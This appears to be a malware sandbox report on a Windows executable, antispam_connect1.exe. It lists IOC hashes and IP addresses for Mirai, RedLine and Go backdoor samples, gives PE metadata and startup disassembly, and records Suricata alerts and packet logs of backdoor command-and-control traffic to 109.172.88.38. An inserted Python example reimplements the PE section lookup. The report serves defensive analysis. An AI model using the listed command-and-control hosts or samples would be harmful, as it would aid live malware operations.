• na.elf | malicious | Mirai, Okiru | context: 62.120.34.75
• na.elf | malicious | Mirai | context: 31.167.93.113
• ULRmk7oYR7.elf | malicious | Mirai | context: 46.230.84.61
• na.elf | malicious | Mirai | context: 176.224.224.197
• na.elf | malicious | Mirai | context: 5.110.196.218
• na.elf | malicious | Mirai | context: 5.108.208.209
• na.elf | malicious | Mirai | context: 5.108.29.123

Match: I3B-ASAT
• wa_3rd_party_host_32.exe | malicious | GO Backdoor | context: 93.185.159.253
• wa_3rd_party_host_32.exe | malicious | GO Backdoor | context: 93.185.159.253
• 3wtD2jXnxy.exe | malicious | RedLine, STRRAT | context: 93.185.156.125
• 5ndBtx7pRX.exe | malicious | GO Backdoor | context: 93.185.159.253
• 5ndBtx7pRX.exe | malicious | GO Backdoor | context: 93.185.159.253
• GoogleInstaller.exe | malicious | GO Backdoor | context: 93.185.159.253
• 3DF6fqp3ME.elf | malicious | Mirai | context: 78.142.79.102
• q5C2tw1Pc6.elf | malicious | Mirai | context: 37.186.3.143
• IZ4Om6WI3Q.elf | malicious | Unknown | context: 78.142.97.183
• b3astmode.x86.elf | malicious | Mirai | context: 78.142.79.149
                                            No context
                                            No context
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1264
                                            Entropy (8bit):5.383800533480639
                                            Encrypted:false
                                            SSDEEP:24:3FK9WSKco4KmM6GjKbm51s4RPQoUebIl+mZ9tXt/NK3R8O9rD:OWSU4YymI4RIoUeU+mZ9tlNWR8GX
                                            MD5:066042D7A767BAA8CC691874F740A9AD
                                            SHA1:F9372459480770D5D308AC0D512EA03CC37489F5
                                            SHA-256:16CAEEAE49D83237C43A5C69387CE955735A10A91580CA99C8FA17788A7AB654
                                            SHA-512:887AAF1481ECB8BF1C823FDFB77F14D084AD06CC22747B14477F9A533C2E73C0DE123B261D0FA03E81843B150E434DF767E9F7EE7172F3E30B39C20E2CE6005B
                                            Malicious:false
                                            Reputation:low
                                            Preview:@...e.................................:..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\antispam_connect1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):416
                                            Entropy (8bit):6.261819491284434
                                            Encrypted:false
                                            SSDEEP:12:eBfhjrj1yPs1I5jtdjIjyNieZubkZjb2bC4A:evjKiIdEjyNiOuYNOlA
                                            MD5:FCCD33E42CFB13BF2B59A4E61623ADD5
                                            SHA1:33699D94EC298063B40AC858A6B995B1B30F1812
                                            SHA-256:3BC89D5FEA43CA7561364AD1BAB2A37EE7B5F3998AC53F2E390C1794B3E3AF18
                                            SHA-512:EA2334DCCA725165FB7E06EDBFB27F67F7BB87BF5F41F3EF24D387B772D1BF38C6210D4F544BC4E25B47FE652D2CA7BCB30499C765F48CDF302D2D377CB029D5
                                            Malicious:false
                                            Preview:.^84.?.9..<..=<RS,TWA.+(L.&#]./VX.\.M..1Q.Q'@.-,Q=.+Z.[+\0..M^%.X3..^4.VUW".E0.......Y.+.!!:..>PY[>"F/..AQ_3W.W._.;)@S..[]*,G#..\,. P.!^_ -V@4. U..#X.V;B..5.&.6.#.....1.#.RS"Z A.Q.L.8.P.+.].?^M-.,X.,.VU.1VV?.G.;._*.,V..VP ..@../Q?&_\!(.].^.O.(?..6 ..95.:...5..T'0)L_.1F...W".5R;<1GS.;\7..R../[^,.@/&.R#.._?..X...M.Z,P*T6_...O-.,.,[_.<;-.'.$.7..T!/_L..UF.,._"#-[5.!Q"W.@..(R .<Z47^^.9UM..4[44+^1=PU._+G$P.\. WW..+Z1.<
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):5.52276564871013
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:antispam_connect1.exe
                                            File size:6'955'008 bytes
                                            MD5:970c918fdde70fd4e57c0db74cb54be0
                                            SHA1:b1296b7f95cab45b215704de26c8c8bd91cc83b5
                                            SHA256:18cf24c3c90042ffdb9a96d415ad87d78dea4b47cef22e0ba52380de8225b8f0
                                            SHA512:3e7251dc612cb2fd45c76934a342efabce3acb05bce49157e992ebe2dc585c82b97e1bf00ee7babbcb58ff1d56ce46097c244c9c3ba6d35a873daec5c554637b
                                            SSDEEP:98304:BpHghSmPld7yDHVD2tgyxqC135HgZ4CuQFV0j5DQwHmbRuYRRTis:BahXXmD1itXqCJ5HVCuQf0Ok8RVnis
                                            TLSH:EC66D557EEC56F6BC83E947619DF886628B2C8887F028927B75C5A653013718BBC770C
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......yyrK=...=...=...=...<....F..>....F..,....F.. ....F..,.......4.......E.......%.......8...=...]....F..?....F..<....F..<...Rich=..
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x406137
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x66FFF92E [Fri Oct 4 14:18:22 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:87d823a9ce266eb229c3b8fc80389570
                                            Instruction
                                            call 00007F87E12C58F2h
                                            jmp 00007F87E12C5513h
                                            push ebp
                                            mov ebp, esp
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            mov ecx, dword ptr [eax+3Ch]
                                            add ecx, eax
                                            movzx eax, word ptr [ecx+14h]
                                            lea edx, dword ptr [ecx+18h]
                                            add edx, eax
                                            movzx eax, word ptr [ecx+06h]
                                            imul esi, eax, 28h
                                            add esi, edx
                                            cmp edx, esi
                                            je 00007F87E12C569Bh
                                            mov ecx, dword ptr [ebp+0Ch]
                                            cmp ecx, dword ptr [edx+0Ch]
                                            jc 00007F87E12C568Ch
                                            mov eax, dword ptr [edx+08h]
                                            add eax, dword ptr [edx+0Ch]
                                            cmp ecx, eax
                                            jc 00007F87E12C568Eh
                                            add edx, 28h
                                            cmp edx, esi
                                            jne 00007F87E12C566Ch
                                            xor eax, eax
                                            pop esi
                                            pop ebp
                                            ret
                                            mov eax, edx
                                            jmp 00007F87E12C567Bh
                                            call 00007F87E12C5E0Ah
                                            test eax, eax
                                            jne 00007F87E12C5685h
                                            xor al, al
                                            ret
                                            mov eax, dword ptr fs:[00000018h]
                                            push esi
                                            mov esi, 00AA1E38h
                                            mov edx, dword ptr [eax+04h]
                                            jmp 00007F87E12C5686h
                                            cmp edx, eax
                                            je 00007F87E12C5692h
                                            xor eax, eax
                                            mov ecx, edx
                                            lock cmpxchg dword ptr [esi], ecx
                                            test eax, eax
                                            jne 00007F87E12C5672h
                                            xor al, al
                                            pop esi
                                            ret
                                            mov al, 01h
                                            pop esi
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            cmp dword ptr [ebp+08h], 00000000h
                                            jne 00007F87E12C5689h
                                            mov byte ptr [00AA1E54h], 00000001h
                                            call 00007F87E12C5C21h
                                            call 00007F87E12C60A7h
                                            test al, al
                                            jne 00007F87E12C5686h
                                            xor al, al
                                            pop ebp
                                            ret
                                            call 00007F87E12C915Dh
                                            test al, al
                                            jne 00007F87E12C568Ch
                                            push 00000000h
                                            call 00007F87E12C60B8h
                                            pop ecx
                                            jmp 00007F87E12C566Bh
                                            mov al, 01h
                                            pop ebp
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 0Ch
                                            push esi
                                            mov esi, dword ptr [ebp+08h]
                                            test esi, esi
                                            Programming Language:
                                            • [ C ] VS2015 UPD3.1 build 24215
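The disassembly listed above at the entry point is not sample-specific logic: the function beginning `push ebp / mov ebp, esp / mov eax, dword ptr [ebp+08h]` follows e_lfanew (`[eax+3Ch]`), reads NumberOfSections (`[ecx+06h]`) and SizeOfOptionalHeader (`[ecx+14h]`), steps through the 0x28-byte IMAGE_SECTION_HEADER array and returns the header whose VirtualAddress (`[edx+0Ch]`) and VirtualSize (`[edx+08h]`) bracket a given RVA. That is the section lookup the VS2015 C runtime performs during startup, consistent with the compiler detection above; the following helper reads the TEB through `fs:[18h]` and takes a startup lock with `lock cmpxchg`, which is the idiom sandbox signatures such as "Contains functionality to read the PEB" key on. The Python below is an added example, not code from the report or from the sample: it reimplements the same walk over a header-only PE image constructed from the section table printed further down (the image has no code or data, only headers), so the lookup for the entry point 0x406137 at image base 0x400000 can be checked against the report's "Entrypoint Section: .text".

```python
import struct

# IMAGE_DOS_HEADER / IMAGE_NT_HEADERS / IMAGE_SECTION_HEADER offsets used by the
# disassembled helper (mov ecx,[eax+3Ch]; movzx [ecx+06h]; movzx [ecx+14h];
# lea edx,[ecx+18h]; imul esi,eax,28h; cmp ecx,[edx+0Ch]; add eax,[edx+08h]).
E_LFANEW = 0x3C               # IMAGE_DOS_HEADER.e_lfanew -> offset of "PE\0\0"
NUMBER_OF_SECTIONS = 0x06     # relative to the PE signature
SIZE_OF_OPTIONAL_HDR = 0x14
OPTIONAL_HDR_START = 0x18     # section headers follow the optional header
SECTION_HDR_SIZE = 0x28
SECTION_HDR_FMT = "<8sIIIIIIHHI"  # Name, VirtualSize, VirtualAddress, SizeOfRawData,
                                   # PointerToRawData, PointerToRelocations,
                                   # PointerToLinenumbers, NumberOfRelocations,
                                   # NumberOfLinenumbers, Characteristics

# IMAGE_SCN_* bits, in the order the report's section table prints them.
SCN_FLAGS = [
    (0x00000020, "IMAGE_SCN_CNT_CODE"),
    (0x00000040, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
    (0x02000000, "IMAGE_SCN_MEM_DISCARDABLE"),
    (0x20000000, "IMAGE_SCN_MEM_EXECUTE"),
    (0x40000000, "IMAGE_SCN_MEM_READ"),
    (0x80000000, "IMAGE_SCN_MEM_WRITE"),
]


def describe_characteristics(chars):
    """Decode a section Characteristics dword into the flag names the report shows."""
    return [name for bit, name in SCN_FLAGS if chars & bit]


def find_pe_section(image, rva):
    """Mirror of the disassembled walk: the header of the section whose
    [VirtualAddress, VirtualAddress + VirtualSize) range contains `rva`, or None.
    Returned as (name, VirtualAddress, VirtualSize, Characteristics)."""
    nt = struct.unpack_from("<I", image, E_LFANEW)[0]
    if image[nt:nt + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    nsec = struct.unpack_from("<H", image, nt + NUMBER_OF_SECTIONS)[0]
    opt_size = struct.unpack_from("<H", image, nt + SIZE_OF_OPTIONAL_HDR)[0]
    off = nt + OPTIONAL_HDR_START + opt_size
    for _ in range(nsec):                      # edx walks toward esi in 0x28 steps
        name, vsize, vaddr, *_rest, chars = struct.unpack_from(SECTION_HDR_FMT, image, off)
        if vaddr <= rva < vaddr + vsize:       # the two jc tests in the listing
            return name.rstrip(b"\0").decode("ascii"), vaddr, vsize, chars
        off += SECTION_HDR_SIZE
    return None                                # xor eax, eax


# Section layout copied from the report's section table; everything else in this
# image is a constructed stand-in (no code, no imports), enough for the header walk.
REPORT_SECTIONS = [  # (name, VirtualAddress, VirtualSize, Characteristics)
    (b".text",  0x001000, 0x0120b1, 0x60000020),
    (b".rdata", 0x014000, 0x438ed6, 0x40000040),
    (b".data",  0x44d000, 0x255960, 0xC0000040),
    (b".gfids", 0x6a3000, 0x0000ac, 0x40000040),
    (b".rsrc",  0x6a4000, 0x0001e0, 0x40000040),
    (b".reloc", 0x6a5000, 0x0016e4, 0x42000040),
]


def build_header_only_pe(sections):
    """Constructed PE32 image: DOS header, PE signature, file header, a zeroed
    0xE0-byte optional header and the given section headers."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW, len(dos))
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)   # IMAGE_NT_OPTIONAL_HDR32_MAGIC
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0,
                           len(optional), 0x0102)  # i386, EXECUTABLE_IMAGE | 32BIT_MACHINE
    headers = b"".join(struct.pack(SECTION_HDR_FMT, n, vs, va, 0, 0, 0, 0, 0, 0, ch)
                       for n, va, vs, ch in sections)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(optional) + headers


def entrypoint_section(image, entrypoint_va, image_base):
    """Name of the section holding the entry point (the report's 'Entrypoint Section'
    field), or None when the RVA lies in a gap between sections."""
    hit = find_pe_section(image, entrypoint_va - image_base)
    return hit[0] if hit else None


if __name__ == "__main__":
    img = build_header_only_pe(REPORT_SECTIONS)
    print(entrypoint_section(img, 0x406137, 0x400000))
    for name, va, vs, ch in REPORT_SECTIONS:
        print(name.decode(), hex(va), hex(vs), ", ".join(describe_characteristics(ch)))
```

The same walk applied to the real file would use the bytes on disk and the Imagebase from the optional header; here the header-only image keeps the example self-contained. Note that the runtime helper checks RVAs against VirtualSize, not SizeOfRawData, so an RVA inside a section's padding (here, between the end of .text at 0x130b1 and the start of .rdata at 0x14000) is reported as belonging to no section.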
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x44c7c4 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6a4000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6a5000 | 0x16e4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x44bf80 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x44bfa0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x14000 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x120b1 | 0x12200 | 1ac8cab19530b4757be5dc19b9a1067c | False | 0.5229929956896552 | data | 6.724608949332727 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x14000 | 0x438ed6 | 0x439000 | 88409a264cc547d14f1f84a33ccef5b9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x44d000 | 0x255960 | 0x254e00 | d855adc436a39f865984d1e70fb4dc06 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids | 0x6a3000 | 0xac | 0x200 | f6bc001410404bd6a3e9c64046ec76b5 | False | 0.279296875 | data | 1.4243123714093135 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x6a4000 | 0x1e0 | 0x200 | 34442f509ec3c01f66e7516c976442ab | False | 0.52734375 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6a5000 | 0x16e4 | 0x1800 | 8ad16325c76aac355eebe615261cda98 | False | 0.74951171875 | data | 6.502312402778559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x6a4060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | InitializeCriticalSection, CreateFileA, WriteFile, CloseHandle, GetLastError, TryEnterCriticalSection, GetFileAttributesA, FindFirstFileA, FindNextFileA, LeaveCriticalSection, GetFileType, SetEndOfFile, SetFilePointer, CreateNamedPipeA, PeekNamedPipe, ExitProcess, VirtualAlloc, SetHandleInformation, FindClose, EnterCriticalSection, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, SetLastError, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, DecodePointer, CreateFileW, RaiseException
AVIFIL32.dll | AVIFileOpenA
Language of compilation system | Country where language is spoken | Map
English | United States | -
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-14T17:22:22.101286+0200 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 109.172.88.38 | 12658 | 192.168.2.5 | 49705 | TCP
2024-10-14T17:22:22.101463+0200 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.5 | 49705 | 109.172.88.38 | 12658 | TCP
2024-10-14T17:22:51.459438+0200 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.5 | 49705 | 109.172.88.38 | 12658 | TCP
2024-10-14T17:22:51.683092+0200 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 109.172.88.38 | 12658 | 192.168.2.5 | 49705 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2024 17:22:20.396753073 CEST | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:20.401643991 CEST | 80 | 49704 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:20.401743889 CEST | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:20.402834892 CEST | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:20.408046961 CEST | 80 | 49704 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:21.447716951 CEST | 80 | 49704 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:21.452435970 CEST | 49705 | 12658 | 192.168.2.5 | 109.172.88.38
Oct 14, 2024 17:22:21.459000111 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:22:21.459076881 CEST | 49705 | 12658 | 192.168.2.5 | 109.172.88.38
Oct 14, 2024 17:22:21.491427898 CEST | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:22.101285934 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:22:22.101463079 CEST | 49705 | 12658 | 192.168.2.5 | 109.172.88.38
Oct 14, 2024 17:22:22.106338024 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:22:36.938982964 CEST | 49784 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:36.944680929 CEST | 80 | 49784 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:36.945841074 CEST | 49784 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:36.946562052 CEST | 49784 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:36.951904058 CEST | 80 | 49784 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:37.226855040 CEST | 49705 | 12658 | 192.168.2.5 | 109.172.88.38
Oct 14, 2024 17:22:37.232384920 CEST | 12658 | 49705 | 109.172.88.38 | 192.168.2.5
Oct 14, 2024 17:22:37.610862017 CEST | 80 | 49784 | 46.8.232.106 | 192.168.2.5
Oct 14, 2024 17:22:37.628695011 CEST | 49790 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:37.633723974 CEST | 80 | 49790 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:22:37.633824110 CEST | 49790 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:37.634156942 CEST | 49790 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:37.639127970 CEST | 80 | 49790 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:22:37.759937048 CEST | 49784 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:38.384016991 CEST | 80 | 49790 | 46.8.236.61 | 192.168.2.5
Oct 14, 2024 17:22:38.431571960 CEST | 49790 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:38.472533941 CEST | 49791 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:38.477780104 CEST | 80 | 49791 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:22:38.477888107 CEST | 49791 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:38.481688976 CEST | 49791 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:38.487556934 CEST | 80 | 49791 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:22:39.177650928 CEST | 80 | 49791 | 93.185.159.253 | 192.168.2.5
Oct 14, 2024 17:22:39.193622112 CEST | 49797 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:39.198493958 CEST | 80 | 49797 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:22:39.198575974 CEST | 49797 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:39.199464083 CEST | 49797 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:39.204591036 CEST | 80 | 49797 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:22:39.278326035 CEST | 49791 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:39.915122986 CEST | 80 | 49797 | 91.212.166.91 | 192.168.2.5
Oct 14, 2024 17:22:39.931206942 CEST | 49803 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:39.936105967 CEST | 80 | 49803 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:22:39.936191082 CEST | 49803 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:39.936436892 CEST | 49803 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:39.941313028 CEST | 80 | 49803 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:22:39.968287945 CEST | 49797 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:41.036286116 CEST | 80 | 49803 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:22:41.043606997 CEST | 49803 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:41.043643951 CEST | 49797 | 80 | 192.168.2.5 | 91.212.166.91
Oct 14, 2024 17:22:41.043663979 CEST | 49791 | 80 | 192.168.2.5 | 93.185.159.253
Oct 14, 2024 17:22:41.043725967 CEST | 49784 | 80 | 192.168.2.5 | 46.8.232.106
Oct 14, 2024 17:22:41.043750048 CEST | 49790 | 80 | 192.168.2.5 | 46.8.236.61
Oct 14, 2024 17:22:41.048897028 CEST | 80 | 49803 | 188.130.206.243 | 192.168.2.5
Oct 14, 2024 17:22:41.048957109 CEST | 49803 | 80 | 192.168.2.5 | 188.130.206.243
Oct 14, 2024 17:22:41.049745083 CEST | 80 | 49797 | 91.212.166.91 | 192.168.2.5
